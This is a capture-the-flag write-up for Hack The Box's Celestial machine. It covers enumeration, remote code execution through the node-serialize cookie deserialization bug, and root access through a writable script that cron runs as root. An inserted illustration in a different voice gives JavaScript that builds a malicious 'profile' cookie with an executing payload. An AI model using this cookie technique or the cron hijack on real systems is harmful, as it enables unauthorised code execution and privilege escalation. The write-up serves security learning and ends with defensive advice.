Hackthebox: Celestial write-up

Hadi Mene
May 1, 2020

Hello folks. Here I will describe, step by step, how to get root on Celestial, which has now been retired.

The IP address of the box is 10.10.10.85.

Enumeration

root@h4d3s:~# nmap -sT -T5 -A 10.10.10.85
Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-12 16:48 CEST
Nmap scan report for 10.10.10.85
Host is up (0.027s latency).
Not shown: 999 closed ports
PORT     STATE SERVICE VERSION
3000/tcp open  http    Node.js Express framework
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
Aggressive OS guesses: Linux 3.12 (95%), Linux 3.13 (95%), Linux 3.2-4.9 (95%), Linux 3.8-3.11 (95%), Linux 4.8 (95%), Linux 4.4 (95%), Linux 4.9 (95%), Linux 3.16 (95%), Linux 3.18 (95%), Linux 4.2 (95%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
TRACEROUTE (using proto 1/icmp)
HOP RTT      ADDRESS
1   74.76 ms 10.10.16.1
2   15.42 ms 10.10.10.85
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.91 seconds

Nmap has found a single open port: a Node.js (Express) application on port 3000.

When we visit the Node.js application on port 3000 we find that

dirb doesn't find anything (we are not facing a usual web application):

root@h4d3s:~# dirb http://10.10.10.85:3000
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sat May 12 17:00:02 2018
URL_BASE: http://10.10.10.85:3000/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.10.10.85:3000/ ----
^C> Testing: http://10.10.10.85:3000/Privacy

Looking more closely at the index page (the request and response headers, not just the body), we find a suspicious cookie named profile.

The profile value, once URL-decoded, is the base64 string "eyJ1c2VybmFtZSI6IkR1bW15IiwiY291bnRyeSI6IklkayBQcm9iYWJseSBTb21ld2hlcmUgRHVtYiIsImNpdHkiOiJMYW1ldG93biIsIm51bSI6IjIifQ==", which decodes to '{"username":"Dummy","country":"Idk Probably Somewhere Dumb","city":"Lametown","num":"2"}'.

We can conclude that the Node.js application uses this value to build the index page. The string looks like a serialized object, so the server is probably deserializing it on every request, and since the cookie is entirely under our control, whatever the deserializer does with it is attacker-driven.

A bit of Google searching turns up a good write-up on this Node.js deserialization vulnerability (the node-serialize module, which eval()s function strings during unserialize()) and how it leads to RCE: https://www.exploit-db.com/docs/english/41289-exploiting-node.js-deserialization-bug-for-remote-code-execution.pdf

Reproducing that paper step by step (a serialized profile whose value carries an immediately-invoked function, base64-encoded and sent back in the profile cookie) gives us a shell as 'sun', from which we can fetch user.txt.
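To make clear why a cookie becomes code execution, here is an added example (my own illustration, not code from the write-up or from the box) that models what the cited paper describes: node-serialize's unserialize() eval()s any string value tagged with the _$$ND_FUNC$$_ marker, so an attacker-supplied "function(){...}()" inside the profile cookie runs inside the server process. The deserializer below is a simplified, hypothetical re-implementation of that behaviour, not the real module; the decoding helper is run against the cookie value quoted above; and the assumption, taken from the paper, is that the app base64-decodes the cookie and passes it straight to unserialize().

```javascript
// Added example: simplified model of the node-serialize unserialize() bug
// (exploit-db 41289) and a builder for a malicious "profile" cookie.
// Assumption: the server does unserialize(base64decode(cookie)), as in the paper.

// node-serialize tags serialized functions with this prefix and eval()s
// whatever follows it when the object is unserialized.
const FUNC_MARKER = '_$$ND_FUNC$$_';

// The profile cookie value observed on the box (quoted in the write-up above).
const ORIGINAL_COOKIE =
  'eyJ1c2VybmFtZSI6IkR1bW15IiwiY291bnRyeSI6IklkayBQcm9iYWJseSBTb21ld2hlcmUgRHVtYiIsImNpdHkiOiJMYW1ldG93biIsIm51bSI6IjIifQ==';

// Decode a cookie the way the server would: URL-decode, base64-decode, JSON-parse.
function decodeProfileCookie(cookieValue) {
  const b64 = decodeURIComponent(cookieValue);
  return JSON.parse(Buffer.from(b64, 'base64').toString('utf8'));
}

// Hypothetical re-implementation of node-serialize's unserialize(): any string
// property that starts with the marker is handed to eval(). Because the string
// is attacker-controlled, "function(){...}()" is an IIFE that executes during
// deserialization, before the app ever looks at the object.
function unserializeLikeNodeSerialize(json) {
  const obj = JSON.parse(json);
  for (const key of Object.keys(obj)) {
    const v = obj[key];
    if (typeof v === 'string' && v.startsWith(FUNC_MARKER)) {
      obj[key] = eval('(' + v.slice(FUNC_MARKER.length) + ')');
    }
  }
  return obj;
}

// Build a profile cookie whose "num" field carries an IIFE that runs jsCode.
// The other fields are kept as the box sends them so the page still renders.
function buildMaliciousProfileCookie(jsCode) {
  const profile = {
    username: 'Dummy',
    country: 'Idk Probably Somewhere Dumb',
    city: 'Lametown',
    num: FUNC_MARKER + 'function(){' + jsCode + '}()',
  };
  const b64 = Buffer.from(JSON.stringify(profile), 'utf8').toString('base64');
  return encodeURIComponent(b64); // "==" padding becomes %3D%3D in the real cookie
}

// Simulate the vulnerable server consuming the cookie.
function serverHandlesCookie(cookieValue) {
  const json = Buffer.from(decodeURIComponent(cookieValue), 'base64').toString('utf8');
  return unserializeLikeNodeSerialize(json);
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(decodeProfileCookie(ORIGINAL_COOKIE));
  // Harmless payload: proves attacker code ran inside the "server" process.
  // The paper's real payload uses require('child_process').exec(...) here.
  const cookie = buildMaliciousProfileCookie("return 'ran in pid ' + process.pid");
  console.log(serverHandlesCookie(cookie).num);
}
```

The takeaway for a defender is the shape of the fix rather than the payload: never feed untrusted input to a deserializer that can instantiate functions; use plain JSON.parse() for data, and sign or encrypt session cookies so they cannot be tampered with in the first place.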

Privilege Escalation

The privilege escalation on this box is straightforward: in sun's home directory there is a script.py that cron runs as root at a fixed interval, and since the file is writable by sun, editing it gets our own Python code executed as root. Before relying on it, it is worth confirming that the script really is writable by sun and checking where and as whom cron schedules it (for example in /etc/crontab or root's crontab), then waiting one interval for the job to fire.
